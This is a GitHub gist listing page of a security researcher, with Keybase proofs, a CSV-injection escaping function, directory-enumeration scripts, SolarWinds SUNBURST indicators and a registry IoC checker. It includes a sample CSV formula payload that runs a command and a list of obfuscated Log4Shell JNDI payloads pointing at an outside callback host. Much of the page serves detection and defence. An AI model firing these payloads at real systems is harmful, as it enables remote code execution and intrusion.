I hereby claim:
- I am ZephrFish on github.
- I am zephrfish (https://keybase.io/zephrfish) on keybase.
- I have a public key whose fingerprint is FADA 204E 6BAE 1870 E42F D105 0DD0 B1CC 7DF5 ADC0
To claim this, I am signing this object:
Andy | ZephrFish ZephrFish
🌐
ZephrFish
/ gist:c78509e77896566b53c9
Created
August 17, 2014 14:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am ZephrFish on github. | |
| * I am zephrfish (https://keybase.io/zephrfish) on keybase. | |
| * I have a public key whose fingerprint is EC67 4DC5 F2F0 87E5 598B B920 ED66 4E92 D071 41CA | |
| To claim this, I am signing this object: |
ZephrFish
/ csv_generated_string_escape.py
Last active
August 22, 2023 23:44
— forked from seanieb/csv_generated_string_escape.py
Prevent CSV Injection when suing user generated data
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def escape_csv(payload): | |
| if payload[0] in ('@','+','-', '=', '|'): | |
| payload = "'" + payload | |
| payload = payload.replace("|", "\|") | |
| return payload | |
| # Example | |
| payload = "@cmd|' /C calc'!A0" | |
| print("The Unescaped version is: " + payload) | |
| print("When passed though escape function the value is: " + escape_csv(payload)) |
ZephrFish
/ keybase.md
Created
May 29, 2017 20:39
ZephrFish
/ MediaDash.html
Last active
December 30, 2017 23:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> | |
| <link rel="stylesheet" type="text/css" href="css/custom.css"> | |
| <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"> | |
| <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script> | |
| <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script> | |
| <title>Application Loader ZSEC-Net</title> | |
| <style> | |
| .ad-left { |
ZephrFish
/ dirprinter.py
Created
October 10, 2018 10:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Dir Checker | |
| # Prints out URLs and Paths together | |
| import itertools | |
| import sys | |
| def dirprint(urls, paths): | |
| x = open(urls).read().split("\n") | |
| y = open(paths).read().split("\n") | |
| for a, b in itertools.product(x, y): | |
| print("{}/{}".format(a, b)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| def quickWin(url, paths): | |
| with open(paths, 'r') as f: | |
| for path in f.read().splitlines(): |
ZephrFish
/ Solarwinds Orion Hashes of Known Malicious IoCs
Created
December 14, 2020 03:09
Solarwinds Orion Hashes of Known Malicious IoCs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Solarwinds Orion Hashes of Known Malicious IoCs | |
| Sha256: 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 | |
| Sha1: 2f1a5a7411d015d01aaee4535835400191645023 | |
| Sha256: ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 | |
| Sha1: d130bd75645c2433f88ac03e73395fba172ef676 | |
| Sha256: 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 | |
| Sha1: 76640508b1e7759e548771a5359eaed353bf1eec |
ZephrFish
/ Solarwinds UNC2452 SUNBURST - Decrypted List
Created
December 18, 2020 07:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -7n | |
| -9s | |
| -er7kj | |
| -gn | |
| -jc5pe | |
| -jlowd | |
| -ka25u | |
| -lxwg8exljmcqy | |
| -wwgi2xnl | |
| -xhi7z |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Checks the registry for IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ | |
| # If not vulnerable should return "ERROR: The system was unable to find the specified registry key or value." | |
| reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig" | |
| reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig" | |
| reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update" | |
| # Checks the paths of IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ | |
| # If not vulnerable each will return false | |
| Test-Path C:\Windows\System32\Nwsapagent.sys | |
| Test-Path C:\Windows\System32\helpsvc.sys |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
| ${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} |
OlderNewer